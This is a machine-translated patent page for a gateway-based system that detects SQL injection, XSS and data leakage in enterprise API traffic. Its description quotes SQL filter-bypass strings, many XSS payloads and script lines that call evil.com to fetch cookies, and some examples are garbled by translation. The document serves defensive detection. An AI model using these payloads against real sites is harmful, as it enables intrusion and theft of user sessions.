CN112861125A - Security detection method, device, equipment and storage medium based on open platform - Google Patents

Security detection method, device, equipment and storage medium based on open platform Download PDF

Info

Publication number
CN112861125A
CN112861125A CN202110255514.1A CN202110255514A CN112861125A CN 112861125 A CN112861125 A CN 112861125A CN 202110255514 A CN202110255514 A CN 202110255514A CN 112861125 A CN112861125 A CN 112861125A
Authority
CN
China
Prior art keywords
data
open platform
detection
service
security
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Pending
Application number
CN202110255514.1A
Other languages
Chinese (zh)
Inventor
龚毅
林振钦
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Dongpu Software Co Ltd
Original Assignee
Dongpu Software Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Dongpu Software Co Ltd filed Critical Dongpu Software Co Ltd
Priority to CN202110255514.1A priority Critical patent/CN112861125A/en
Publication of CN112861125A publication Critical patent/CN112861125A/en
Pending legal-status Critical Current

Links

Images

Classifications

    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L12/00Data switching networks
    • H04L12/66Arrangements for connecting between networks having differing types of switching systems, e.g. gateways
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55Detecting local intrusion or implementing counter-measures
    • G06F21/554Detecting local intrusion or implementing counter-measures involving event detection and direct action

Abstract

The invention discloses a security detection method, a device, equipment and a storage medium based on an open platform, aiming at the problems that various functional interfaces are opened to the outside by the existing enterprise business system and are maintained by different teams, and the problems which cannot be found in time when the interfaces suffer from security intrusion or the interfaces have data leakage, the open platform is utilized to analyze the incoming and outgoing data called by all the interfaces, support the detection of SQL injection, XSS injection and sensitive data leakage, and send early warning and intervention to the found problems in time, so that the enterprise business system can utilize a gateway to control before self repair, process the data security problems in time, and reduce the economic loss of the enterprise due to the data leakage.

Description

Security detection method, device, equipment and storage medium based on open platform
Technical Field
The invention belongs to the technical field of data security, and particularly relates to a security detection method, a security detection device, security detection equipment and a storage medium based on an open platform.
Background
With the rapid development of computer technology, enterprises are transformed into electronics, which brings great convenience to the life of people and brings many safety problems. Various functional interfaces are provided externally inside the enterprise and are maintained by different teams. When the interfaces are subjected to security intrusion or data leakage exists in the interfaces, the interfaces cannot be discovered in time, and most of the interfaces cannot be solved after the results are generated or captured by a security team. Because each functional interface bears a normal service scene, after a data security problem occurs, the service system can be opened to the outside by waiting for repair of the service system and completing an online process. Therefore, failure to timely discover or slow to deal with data leakage problems can increase the time that an enterprise is exposed to damage. Therefore, a detection method for timely finding out the data leakage problem is urgently needed to prevent enterprises from suffering economic loss due to the leakage of business data; and malicious activities such as data selling, fraud, commercial competition and the like, which are carried out by lawless persons stealing enterprise data, are also prevented.
The following data leakage detection schemes are mainly used at present:
1) and identifying a data leakage detection scheme of the data file based on the content characteristics, and matching the data content in the data file transmission process by a user through predefined or customized data keyword characteristics, and giving an alarm or intercepting if the data content is matched. The scheme has the defects that the scheme cannot deal with encrypted files, when an attacker uses encryption protocols such as RDPSSH and the like or directly encrypts and transmits the files, a system cannot detect the encrypted files, a large number of behaviors of missed judgment and misjudgment exist, and the core of the accuracy of the system lies in whether the keyword feature set is complete and accurate.
2) The data leakage detection scheme based on user operation behavior analysis requires a specific detection and analysis device to be installed on the terminal side to perform audit analysis on the user operation behavior. Firstly, installing software on a terminal side can affect the stability of a service, modifying the configuration of a system, hijacking a process behavior, causing a fault of the software, and the like can increase the instability of the system, and meanwhile, the system overhead is increased. Secondly, when the number of terminals is large, the maintainability of the detection system is poor, and the deployment is difficult.
3) Acquiring data to be detected, and determining a target association rule according to the characteristic information of the data to be detected; generating a safety detection task corresponding to the data to be detected by using a target association rule under a preset service framework; and executing the safety detection task to obtain a task result and generating a correlation event corresponding to the task result. According to the method, a plurality of independent detection codes are not required to be written, the generation of a safety monitoring task is completed through the association rule and the service framework, the detection of different conditions can be carried out on the data to be detected by changing the target association rule, corresponding association events are obtained, and the workload required by the increase or modification of the association rule is far less than that required by the writing or modification of the detection codes, so that the waste of labor and time is avoided.
Disclosure of Invention
The invention aims to provide a security detection method, a security detection device, security detection equipment and a storage medium based on an open platform, wherein the open platform is used for analyzing the incoming and outgoing data called by all interfaces, the detection of SQL injection, XSS injection and sensitive data leakage is supported, and early warning is given to the found problems in time, so that an enterprise business system can utilize gateway control before self repair to process the data security problems in time, and the economic loss of an enterprise caused by data leakage is reduced.
In order to solve the problems, the technical scheme of the invention is as follows:
a security detection method based on an open platform comprises a gateway service, a Kafka message system, a data analysis service and a data processing service; the data security detection method based on the open platform comprises the following steps:
collecting a plurality of functional interfaces of a tested service system, and uniformly accessing to a gateway of an open platform;
acquiring data of each functional interface through gateway service, and bypassing the acquired data to a Kafka message system; the data is data of interaction between the tested business system and an external third party;
the data analysis service reads data in the Kafka message system for security detection, and sends the found data security problem to the data processing service;
and the data processing service sends a corresponding intervention instruction to the gateway service according to the level of the data security problem, so as to realize data flow control and access right control of the functional interface of the tested service system.
According to an embodiment of the present invention, the reading, by the data analysis service, the data in the Kafka message system for security detection further includes:
detecting SQL injection;
detection of XSS injection;
detection of sensitive data leaks.
According to an embodiment of the present invention, the detecting SQL injection further comprises:
and detecting whether the SQL injection vulnerability exists in the data, and if so, pre-compiling the data to avoid the SQL injection of the data.
According to an embodiment of the present invention, the pre-compiling data further includes:
calling a preparedState class in JDBC to perform precompilation on data and generate a compiled SQL statement; when the data is executed, the compiled SQL sentences are directly used, and SQL injection is avoided.
According to an embodiment of the present invention, the detecting of the XSS injection further comprises:
the data is coded, and attack payload is exposed, so that analysis is facilitated;
performing lexical extraction on the coded data to obtain html data and javascript data;
carrying out grammar detection on the javascript data to obtain a detection result;
and performing semantic judgment according to the grammar detection result to obtain the probability of the data being injected by XSS.
According to an embodiment of the present invention, the detecting of the sensitive data leakage further includes:
based on natural language processing and text classification algorithm, adopting artificial intelligence theory and machine learning technology, constructing a classification model capable of understanding and identifying natural language, associating documents with one or more predefined categories according to semantic features and formats of text contents, clustering and classifying key data, and monitoring whether data interacted between a tested business system and an external third party contains data of the key categories in real time, so that use and outgoing of the key data are monitored and audited, and sensitive data leakage is avoided.
An open platform based security detection apparatus comprising:
the interface access module is used for collecting a plurality of functional interfaces of the tested service system and uniformly accessing the gateways of the open platform;
the data acquisition module is used for acquiring data of each functional interface through gateway service and bypassing the acquired data to the Kafka message system; the data is data of interaction between the tested business system and an external third party;
the data analysis module is used for reading data in the Kafka message system through the data analysis service to perform security detection and sending the found data security problem to the data processing service;
and the data processing module is used for sending a corresponding intervention instruction to the gateway service through the data processing service according to the level of the data security problem, so as to realize data flow control and access authority control of the functional interface of the tested business system.
According to an embodiment of the present invention, the data analysis module includes a first detection unit, a second detection unit, and a third detection unit;
the first detection unit is used for detecting SQL injection;
the second detection unit is used for detecting XSS injection;
the third detection unit is used for detecting sensitive data leakage.
The safety detection device based on the open platform comprises a memory and a processor, wherein computer readable instructions are stored in the memory, and when the processor executes the computer readable instructions, the safety detection device based on the open platform in one embodiment of the invention is realized.
A computer-readable medium storing a computer program which, when executed by one or more processors, implements an open platform based security detection method in an embodiment of the invention.
Due to the adoption of the technical scheme, compared with the prior art, the invention has the following advantages and positive effects:
1) the safety detection method based on the open platform in one embodiment of the invention aims at the problems that various functional interfaces are opened to the outside by the existing enterprise business system and are maintained by different teams, and the interfaces cannot be found in time when the interfaces are subjected to safety intrusion or data leakage exists in the interfaces, the open platform is used for analyzing the incoming and outgoing data called by all the interfaces, the detection of SQL injection, XSS injection and sensitive data leakage is supported, early warning is given out in time on the found problems, so that the enterprise business system can utilize a gateway to control before self repair, the data safety problem is processed in time, and the economic loss of the enterprise caused by the data leakage is reduced.
2) According to the safety detection method based on the open platform, the plurality of functional interfaces of the detected service system are collected and uniformly accessed to the gateway of the open platform, so that the interface data can be managed in a centralized manner, each communication interface does not need to be managed and maintained independently, manpower and material resources are saved, and the maintenance cost of an enterprise is reduced.
3) In the security detection method based on the open platform in the embodiment of the invention, the interface data is bypassed to the Kafka message system through the gateway service, and compared with the calling (the Kafka message system sends a request and the gateway responds), the data transmission mode greatly simplifies the data processing logic, shortens the data transmission time, and is convenient and fast.
Drawings
Fig. 1 is a flow chart of an open platform-based security detection method according to an embodiment of the present invention;
FIG. 2 is a block diagram of an open platform according to an embodiment of the present invention;
FIG. 3 is a data security detection flow diagram in an embodiment of the present invention;
FIG. 4 is a block diagram of an open platform based security detection apparatus according to an embodiment of the present invention;
fig. 5 is a schematic diagram of an open platform-based security detection apparatus according to an embodiment of the present invention.
Detailed Description
The following describes a security detection method, apparatus, device and storage medium based on an open platform in detail with reference to the accompanying drawings and specific embodiments. Advantages and features of the present invention will become apparent from the following description and from the claims.
Example one
The embodiment provides a data security detection method based on an open platform, aiming at the problems that various functional interfaces are externally provided in an enterprise, and the interfaces are maintained by different teams, so that potential safety hazards caused by data leakage cannot be found in time. Referring to fig. 1, the data security detection method based on the open platform includes the following steps:
s1: collecting a plurality of functional interfaces of a tested service system, and uniformly accessing to a gateway of an open platform;
s2: acquiring data of each functional interface through gateway service, and bypassing the acquired data to a Kafka message system; the data is data of interaction between the tested business system and an external third party;
s3: the data analysis service reads data in the Kafka message system for security detection, and sends the found data security problem to the data processing service;
s4: and the data processing service sends a corresponding intervention instruction to the gateway service according to the level of the data security problem, so as to realize data flow control and access right control of the functional interface of the tested service system.
Before the above method is explained in detail, the open platform in the present embodiment will be briefly described. Please refer to fig. 2 for an open platform provided in this embodiment. The system architecture of the open platform comprises a gateway service, an interface forwarding service, an extrapolation service, a data exchange layer, a data analysis service and a background service. The gateway service comprises function services such as account state detection, interface access authority, request, response, bypass data and the like; the data exchange layer comprises a Kafka message system, a Mysql database and the like; data analysis services include data statistics and security detection (SQL injection, XSS injection, and data leakage); the background service comprises functional modules of data maintenance, dynamic intervention (gateway setting, alarm setting, authority setting) and the like. The embodiment adopts the open platform to carry out safety detection on the data interacted between the enterprise internal business system and the external third party, so that data leakage is prevented. Please refer to fig. 3 for its application scenario. And copying data of each functional interface through a gateway of the open platform, bypassing the data to a Kafka message system, carrying out safety detection on the data by using a data analysis service, and giving an alarm if a problem is found. The background service provides rich intervention means, intervention instructions can be provided to the gateway in time through Apollo configuration, and the gateway executes flow control or shutdown and other processing according to the intervention instructions.
Specifically, in step S1, aiming at the problem that a plurality of function interfaces opened by an enterprise to the outside need to be maintained separately, which is time-consuming and labor-consuming, the function interfaces are gathered together and uniformly accessed to the gateway of the open platform. Therefore, when the enterprise internal business system and an external third party perform data interaction through the functional interfaces, data of the enterprise internal business system and the external third party firstly pass through the gateway of the open platform, safety detection is uniformly performed through the open platform, independent data detection is not required to be performed on each functional interface respectively, the efficiency of data safety detection is improved, and waste of manpower and time is avoided.
In step S2, data of each functional interface is acquired by the gateway service, and the acquired data is bypassed to the Kafka message system. And copying the interface data completely through the interface data of the gateway through a request function and a response function in the gateway service, and directly bypassing the interface data into the Kafka message system. The bypass is adopted instead of calling, because the bypass is to directly pack data and transmit the data to the Kafka message system, the method is convenient and quick and is not required to be retained in the gateway. And the Kafka message system is required to send a request when the Kafka message system is called, the gateway responds, the data processing logic is relatively complex, the time spent is relatively long, and the subsequent data security detection efficiency is influenced.
Kafka, among other things, is a high-throughput distributed publish-subscribe messaging system that can handle all the action flow data of a consumer in a web site. The use of Kafka has the following effects:
1) kafka may act as a buffer, and since data may be continuously transmitted from the gateway, if no Kafka receives data from the gateway and then quantitatively and timesharedly provides the data to the data analysis service, the data analysis service may continuously increase in computational load, become more and more burdened, and even cause system crash. While Kafka has its own set of servers (called a Kafka cluster) that do not crash the system.
2) Kafka may reduce the need for multiple integrations. Essentially, Kafka reduces the need for multiple integrations because all data passes through Kafka, eliminating the need for developers to write multiple integrations to obtain data from different systems.
3) Kafka has low latency and high throughput. By decoupling the data flow, Kafka allows data analysis services to use the data as needed. Without requiring slow integration, Kafka reduces the delay (or time required to load each data point) to only 10 milliseconds (by a factor of about 10 or more compared to other integrations). This means that data can be provided quickly and in real time.
In step S3, the data analysis service reads the data in the Kafka message system for security detection, and sends the found data security problem to the data processing service. Wherein, the data analysis service reads the data in the Kafka message system for security detection further comprises:
s21: detecting SQL injection;
s22: detection of XSS injection;
s23: and detection of sensitive data leaks.
Specifically, in step S21, SQL injection is performed to insert an SQL command into the input field of the Web form or the query string of the page request by the attacker, and to trick the server into executing a malicious SQL command.
Typical e-commerce applications use databases to store information. Databases, whether product information, account information, or other types of data, are very important links in a Web application environment. SQL commands are the interface between the front-end Web and the back-end database so that data can be passed to and from the Web application. Control of this data is required to ensure that the user can only be authorized to have information. However, many Web sites dynamically generate SQL query requests using parameters input by users, and an attacker may change query attributes by inputting his own SQL commands in a URL, a table field, or other input fields, and may cheat an application program, thereby allowing unrestricted access to a database.
Because SQL queries are often used for authentication, authorization, ordering, printing lists, etc., it is very dangerous to allow an attacker to arbitrarily submit SQL query requests. Typically, an attacker can use SQL input to retrieve information from a database without authorization.
When a Web application submits input to a backend database, it may be subject to SQL injection attacks. The SQL command can be artificially input into a URL, a table field or other input parameters of a dynamically generated SQL query statement to complete the attack. Because most Web applications rely on the mass storage of databases and their logical relationships to each other (user permission, settings, etc.), there are a large number of parameters in each query.
The specific SQL injection mode is as follows:
1. the SQL injection code segment is created using inline annotation sequences. These codes, while seemingly long, have the effect of being able to bypass a variety of input filters. If the input filter filters the spaces following each SQL keyword, each keyword can be segmented using inline annotators without the need for whitespace characters, which can easily bypass the filtering. Such as: /UNION/SELECT/FROM/user/WHERE/user/home/root' - -. In MySQL databases, inline annotations can be used inside SQL keywords to bypass common keyword filters. For example: i/UN/ION/SE/left/go/M/user/go/WH/ERE/user/go/rest/root/'root' -, such injection statements may still bypass the input filter.
2. Using URL encoding methods
URL coding is a format used by browsers to package form input. The user data in the form of the Web program is output to the server via URL encoding. The essence of the URL encoding is the hexadecimal ASCII encoded form of the character, plus% before the ASCII encoding. For example, "\" has its ASCII code decimal 92, and 92 hexadecimal 5c, so the URL code for "\" is% 5 c.
Suppose that a SQL-Filter Filter can block blank characters and inline annotation sequences/, but cannot block URL encoding of annotation sequences. For this case, a malicious user may bypass the SQL-Filter% 2 f% 2 a/UNION% 2 f% 2 a/SELECT% 2 f% 2 a/password% 2 f% 2 a/FROM% 2 f% 2 a/users% 2 f% 2 a/FROM% 2 f% 2 a/WHERR% 2 f% 2 a/username% 2 f% 2 a/'root' - -.
3. Federated query injection using UNION
The database administrator may use UNION query to join more than two SELECT query statements, so in SQL injection attack, UNION operator has a certain utility value: and injecting a UNION united query at a site accessed by a user to read a data table accessed by the database user. UNION federated query injection includes two conditions: the first is that the number of columns returned by two queries must be the same, and the types of columns corresponding to the data returned by the second two SELECT statements must be the same. If the two constraints are not satisfied, the query fails and an error is returned, and no column-related information appears in the error message, and if the correct number of columns is to be obtained, there are mainly two methods to obtain the correct number of columns. The first method is to inject a second query multiple times, each time incrementally increasing the number of columns until the query executes correctly. The second approach is to use the ORDER BY clause instead of injecting another query. The ORDER BY clause can accept either a column name as a parameter or a simple number that identifies a particular column. The number of columns in the query may be identified BY adding the number representing the column in the ORDER BY clause. After the exact number of columns is identified, one or more of the columns is selected to see if the data is being sought.
4. Bypassing the input filter injection
Web program developers typically consider the use of user input filters at development time, which are designed to protect against common attacks including SQL injection. These filters may be code written by a software engineer or may be a Web application firewall.
In the context of SQL injection attacks, filters are typically intended to block input characters or strings that contain one or more of the following: SQL injection attack keywords include SELECT, AND, UNION, INSERT, etc. Special characters: including quotation marks, hyphens, space marks, etc.
These application code protected by the input filter are not absolutely secure and methods can still be found to exploit these injection vulnerabilities that can circumvent the filter. If the key of the injection attack is only upper case or only lower case, as with the case variant method, the input filter can be bypassed by transforming the case of the characters in the attack string, since the SQL statement use of the database can be case insensitive. For example, if the following inputs are blocked: UNION SELECT PASSWORD FROM Users WHERE USERNAME ═ root' -, then the filter can be bypassed by the following method:
UNION SELECT password FROM users WHERE username=‘root’--。
the SQL injection attack aims at the negligence of programmers in writing, realizes login without account numbers and even tampering with a database through SQL statements, and can realize inquiry or tampering of original data only in the compiling process of the SQL statements. Therefore, if the SQL injection attack is to be avoided, it is first required to detect whether the SQL injection vulnerability exists in the data.
In step S31, it is detected whether the SQL injection vulnerability exists in the data, and if yes, the data is precompiled to avoid the SQL injection.
However, all programs with SQL vulnerability injection are programs that receive variables or parameters delivered by URLs input by users from clients, and the variables or parameters form part of SQL statements, and for the content or delivered parameters input by users, it should be kept alert all the time, which is a principle of "external data untrusted" in the security domain. When detecting whether the SQL injection vulnerability exists in the data, the processing can be started from the following aspects:
1. checking variable data type and format
If the SQL statement is in a form like where id { $ id } and all ids in the database are numbers, then check to ensure that the variable id is int type before SQL is executed; if the mailbox is accepted, it should be checked and strictly ensured that the variable must be in the mailbox format, and other types such as date, time, etc. are also a reason. In short, as long as there are fixed format variables, before the SQL statement is executed, the variables should be checked strictly according to the fixed format to ensure that the variables are in the expected format.
2. Filtering special symbols
For variables for which fixed formats cannot be determined, special symbol filtering or escape processing must be performed.
3. Binding variables, using precompiled statements
Using precompiled statements for binding variables is the best way to prevent SQL injection, and using precompiled SQL statements in which the variable is with a question mark? Indicating that a hacker cannot change the structure of the SQL statement even if the matter is larger.
When precompiling the data, step 41 may be employed: calling a preparedState class in JDBC to perform precompilation on data and generate a compiled SQL statement; when the data is executed, the compiled SQL sentences are directly used, and SQL injection is avoided.
The precompilation principle is that firstly, a parameter set which can be controlled by a client in an SQL statement is compiled to generate a corresponding temporary variable set, then, a corresponding setting method is used for assigning values to elements in the temporary variable set, and an assignment function setString () carries out mandatory type check and safety check on the transmitted parameters, so that SQL injection is avoided.
In step S22, XSS injection is also called css (cross Site script) injection, which is an attack mode in which an attacker uses a website program to filter user input insufficiently and inputs HTML codes that can be displayed on a page to affect other users, thereby stealing user data, performing some action using the user identity, or performing virus attack on a visitor.
The XSS attack means that an intruder inserts data with a malicious purpose into an HTML code of a remote WEB page, the user thinks the page is trustworthy, but when a browser downloads the page, a script embedded in the page is interpreted and executed, and because the HTML language allows the script to be used for simple interaction, the intruder inserts a malicious HTML code into a certain page through a technical means, for example, user information (Cookie) stored in a forum is recorded, and because the Cookie stores a complete user name and password data, the user suffers from security loss. User information can be easily obtained by such a simple Java script: cookie, it pops up a message box containing user information. The intruder can send the user information to their own record page by using the script, and the user sensitive information can be obtained by slight analysis.
Specific XSS injection methods include:
1. injecting HTML/javascript with < script > tag
By introducing < > tag operation to an HTML tag, a malicious user can use < script > tag to insert javascript and vbscript malicious script code at will. The simplest form of an XSS attack is to include an attack character in the < script > tag, with attack payload being similar as follows:
<script>alert(‘XSS’)</script>
<script>location.href=”http://www.evil.com”</script>
<script src=”http://www.evil.com/cookie.php”></script>
the Cheat Sheet test of the payload can obtain the URL of the following Web log: /DVWA/vulnerabilities/xss _ r/? name ═ 3 csccript% 3 earert% 28% E2% 80% 98 xss% E2% 80% 99% 29% 3B% 3C% 2 Fscript% 3E.
The URL definition of the Web log is as follows:
% 3C: the URL coding form of the beginning tip bracket of payload can be regarded as an attack vector character string; script: available HTML tags, attack vectors, without URL coding; alert: the attack function of payload does not use URL coding; % 3C% 2F: the forward slash and the angle bracket between the ending marks can be regarded as special character strings of the attack vector.
2. Injection of javascript script attacks using attribute values of HTML tags
Malicious users may also sometimes use the tagged attribute values to inject javascript script vulnerabilities. Many HTML tags have attribute values that support javascript: the code is in a pseudo protocol form, and the protocol type indicates that the URL main body is any javascript code and can be interpreted and executed by a browser. So a malicious user can perform XSS with the attribute values of the partial HTML tags, attacking payload similarly as follows:
<img src=“javascript:alert(‘XSS’)”>
<imgbackgroud=”javascript:alert(‘XSS’)”>
<ahref="javascript:alert("awarning hrefXSS")">link</a>
the URL of the Web log obtained by the payload has similar contents as follows:
/DVWA/vulnerabilities/xss_r/?
name=%3Cimg+src%3D%22javascript%3Aalert%28%27xss%27%29%3B%22%3E.
the URL definition of the Web log is as follows: javascript: the attack vector character string can be filtered through XSS-Filter; img: attack vector strings; + src: the spaces are obtained by URL coding; alert, javascript alarm function, can be regarded as attack vector value; and others: obtained by URL coding or directly output.
3. Transcoding using HTML tag attribute values
Malicious users can transcode attribute values of tags around attribute values because the attributes of HTML tags themselves support ASCII code forms. The transcoding payload attack load using the attribute value mainly comprises the following forms:
utilizing a blank space: alert ("XSS") "width 50>.
Using ASCII code: < img src ═ javascript #116& #58: alert ("XSS") "width ═ 50>
As can be seen from the ACSII code, the ASCII code value of t is 116: is 58, then javascript: alert ("XSS"); after transcoding, it can become:
javascrip&#116&#58alert("XSS").
the Web log is obtained from the payload as follows:
/DVWA/vulnerabilities/xss_r/?name=%3Cimg+src%3D%22javascrip%26%23116%26%2358alert%28%27xss%27%29%3B%22+width%3D100%3E.
the URL definition of the Web log is as follows: javascript% 26% 23116: the transcoding form of the javascript keyword can be regarded as an attack vector; + src: spaces are obtained by URL coding; % 3 Cimg: start brackets and HTML tag elements; 26% 2358: transcoding forms of the semicolons.
4. Cross-site injection of javascript script using CSS
Malicious users can use the CSS style sheet to inject javascript attacks, and the injection and execution of javascript scripts by using the CSS style sheet have certain flexibility and concealment. Its similar attack load payload is as follows:
<div style="background-image:url(javascript:alert("xss"))">
<div style="width:expression(alert("xss");">
<style>
@import"javascript:alert("xss")";
the Web log is obtained from the payload as follows:
Cx27%5Cx27%5Cx58%5Cx53%5Cx53%5Cx27%5Cx29%22%29%3B%3C%2Fscript%3E.
the URL definition of the Web log is as follows: eval | alert | script: attack vectors encoded with characters; % 3C |% 3E |: encoded start and stop brackets; and others: and (5) URL coding.
5. Injecting javascript with events
An event is some kind of action performed by a user or a browser, and the interaction between javascript and HTML is realized through the event. Such as: mouceover, load, click, etc. Examples are as follows:
<inputtype=buttonvalue="a click"onclick="alert("a click")"/>
after running this piece of code, clicking on button [ a click ], triggers an onclick event and then executes the javascript code [ alert ("a click") ]. The events that can be utilized also include: onerror, onSeek, onsop, onResume, onReverse, etc.
Its similar attack payload is as follows: < img src ═ "#" onerror ═ alert ("xss") >.
The Web log is available from the payload:
/dvwa/vulnerabilities/xss_r/?name=%3Cimg+src%3D%22%23%22+onerror%3Dalert%28%27xss%27%29%3E.
the Web log is defined as follows: % 3C: initial brackets; onerror | onclick | onResume | img: using an attack vector of the event; and others: the URL code is formed or transmitted directly to the Web log.
6. Bypassing injection with character encoding
The character encoding not only can enable XSS script codes to bypass filtering of a server side, but also can better hide shellcode. Its similar attack payload is as follows:
<script>eval("\x61\x6c\x65\x72\x74\x28\x27\x27\x58\x53\x53\x27\x29");</script>
<img src="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#39&#41&#59">
<img src="&#x6a&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a&#x61&#x6c&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&#x3b">
wherein the eval () function in the first payload can be used to compute a string and execute javascript code, this code being equivalent to eval ("alert (" XSS ")); the second payload is coded in decimal notation and the third payload is coded in hexadecimal notation.
The URL of a Web log-like is available from the first payload: /dvwa/vulnerabilities/xss _ r/? name ═ 3 Cscript% 3E + eval% 28% 22% 5Cx 61% 5Cx6 c% 5Cx 65% 5Cx 72% 5Cx 74% 5Cx 28% 5.
By observing all the attack payload, more ways to construct XSS attacks can be obtained, such as obtaining cookies through document.
Common XSS attacks were analyzed above and Web logs were derived from these attacks. For the XSS injection attack method, when detecting the XSS injection, step S51 may be adopted: the data is coded, and attack payload is exposed, so that analysis is facilitated; performing lexical extraction on the coded data to obtain html data and javascript data; carrying out grammar detection on the javascript data to obtain a detection result; and performing semantic judgment according to the grammar detection result to obtain the probability of the data being injected by XSS.
Specifically, for example, the following data are used for detecting XSS injection:
/post_reply.htmlcontent=%3CIMG+SRC%3D%2F+onerror%3D%E2%80%9Calert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E%3C%2Fimg%3E。
firstly, coding data, removing the outer layer wrapping code of the code, exposing attack payload, and obtaining: < IMG SRC ═ onerror ═ alert (string. fromcharrcode (88,83,83)) "> < IMG >.
Then, performing lexical extraction on the data after the coding processing, analyzing and extracting html, and then processing Javascript to obtain: and (3) HTML structure analysis:
Tag_name=IMG
Tag_value[src]=/
tag _ value [ onerror ] ═ alert (string. fromcharke (88,83,83)) ". And analyzing results of the Javascript lexical sequence:
<bareword alert><leftparen><bareword String><dot>
<bareword fromCharCode><leftparen><number><comma><number>
<comma><number><rightparen><rightparen>。
on the basis of the lexical analysis, the grammar result can be checked according to the automaton defined by the Javascript grammar specification, and the following results are obtained: the token sequence of alert (string. fromcharrcode (88,83,83)) conforms to the ECMAScript2017 standard.
And finally, judging the hazard degree of the grammar on the basis of successful grammar analysis, and finally giving a rating according to the hazard degree. Such as: normal or High Risk.
Through the detection, the transmission condition of all the HTML can be found before XSS injection occurs, so that attack behaviors can be distinguished before the attack occurs, and effective interception is carried out.
In step S23, sensitive data refers to data that may cause serious harm to the society or individuals after leakage. It includes personal privacy data such as name, identification number, address, telephone, bank account, mail box, password, medical information, education background, etc.; but also data that the enterprise or social organization is not suitable for publishing, such as the business situation of the enterprise, the network structure of the enterprise, the IP address list, etc.
In the detection of sensitive data leakage, step S61 may be adopted: based on natural language processing and text classification algorithm, adopting artificial intelligence theory and machine learning technology to construct a classification model capable of understanding and identifying natural language, associating documents with one or more predefined categories according to semantic features and formats of text contents, clustering and classifying key data, monitoring whether data interacted between a tested business system and an external third party contains data of the key categories in real time, and monitoring and operating control on circulation and use of the key data, so that use and outgoing of the key data are monitored and audited, and sensitive data leakage is avoided.
In practical application, an Advanced Content Classification Engine (ACCE) module can be adopted to carry out various sensitive data monitoring on data interacted between a detected business system and an external third party, the monitoring modes comprise keyword detection, dictionary detection, regular expression detection and the like, and the related technologies are flexibly combined to carry out comprehensive detection according to different data types.
In step S4, the data processing service sends a corresponding intervention command to the gateway service according to the level of the data security problem, so as to implement data flow control and access right control on the functional interface of the tested service system.
Referring to fig. 3, when the data analysis service detects a data leakage problem, the data processing service will issue an early warning and automatically issue an interception, speed limit, and fusing instruction to the gateway according to the level of the problem, and intercept the subsequent request of the designated interface or the designated user. Except that the data processing service sends an instruction to the gateway, the early warning information can be verified by adopting background manual service, and then an intervention instruction is sent to the gateway. These intervention instructions may support: the method comprises the steps of downloading an interface, stopping a specific user, limiting specified ip, controlling the specified user to access to the specified interface on a day, controlling the specified user to erase a QPS value of the specified interface and a specified field of the specific interface. The specific return field is erased, so that the great effect is achieved on stopping loss in advance under the condition that a service interface cannot be repaired in time when data leakage occurs.
Example two
Referring to fig. 4, the present embodiment provides an open platform-based security detection apparatus, including:
the interface access module 1 is used for collecting a plurality of functional interfaces of the tested service system and uniformly accessing the gateways of the open platform;
the data acquisition module 2 is used for acquiring data of each functional interface through gateway service and bypassing the acquired data to a Kafka message system; the data is data of interaction between the tested business system and an external third party;
the data analysis module 3 is used for reading data in the Kafka message system through a data analysis service to perform security detection, and sending the found data security problem to a data processing service;
and the data processing module 4 is used for sending a corresponding intervention instruction to the gateway service through the data processing service according to the level of the data security problem, so as to realize data flow control and access authority control of the functional interface of the tested business system.
The data analysis module 3 includes a first detection unit 301, a second detection unit 302, and a third detection unit 303; the first detection unit 301 is configured to detect SQL injection, the second detection unit 302 is configured to detect XSS injection, and the third detection unit 303 is configured to detect sensitive data leakage.
The functions and implementation manners of the interface access module 1, the data acquisition module 2, the data analysis module 3, and the data processing module 4 are consistent with those described in the first embodiment, and are not described herein again.
EXAMPLE III
The second embodiment of the present invention describes the security detection apparatus based on the open platform in detail from the perspective of the modular functional entity, and the following describes the security detection apparatus based on the open platform in detail from the perspective of hardware processing.
Referring to fig. 5, the open platform based security detection apparatus 500 may have a relatively large difference due to different configurations or performances, and may include one or more processors (CPUs) 510 (e.g., one or more processors) and a memory 520, one or more storage media 530 (e.g., one or more mass storage devices) storing applications 533 or data 532. Memory 520 and storage media 530 may be, among other things, transient or persistent storage. The program stored on the storage medium 530 may include one or more modules (not shown), each of which may include a series of instructions operating on the open platform based security detection apparatus 500.
Further, the processor 510 may be configured to communicate with the storage medium 530, and execute a series of instruction operations in the storage medium 530 on the open platform based security detection apparatus 500.
The open platform based security detection apparatus 500 may also include one or more power supplies 540, one or more wired or wireless network interfaces 550, one or more input-output interfaces 560, and/or one or more operating systems 531, such as Windows server, Vista, and the like.
Those skilled in the art will appreciate that the open platform based security detection device configuration shown in fig. 5 does not constitute a limitation of open platform based security detection devices and may include more or fewer components than shown, or some components in combination, or a different arrangement of components.
The present invention also provides a computer-readable storage medium, which may be a non-volatile computer-readable storage medium, and which may also be a volatile computer-readable storage medium. The computer-readable storage medium stores instructions that, when executed on a computer, cause the computer to perform the steps of the open platform-based security detection method in the first embodiment.
The modules in the second embodiment, if implemented in the form of software functional modules and sold or used as independent products, may be stored in a computer-readable storage medium. Based on such understanding, the technical solution of the present invention may be substantially or partially implemented in software, which is stored in a storage medium and includes instructions for causing a computer device (which may be a personal computer, a server, or a network device) to execute all or part of the steps of the method according to the embodiments of the present invention. And the aforementioned storage medium includes: a U-disk, a removable hard disk, a Read-only memory (ROM), a Random Access Memory (RAM), a magnetic disk or an optical disk, and other various media capable of storing program codes.
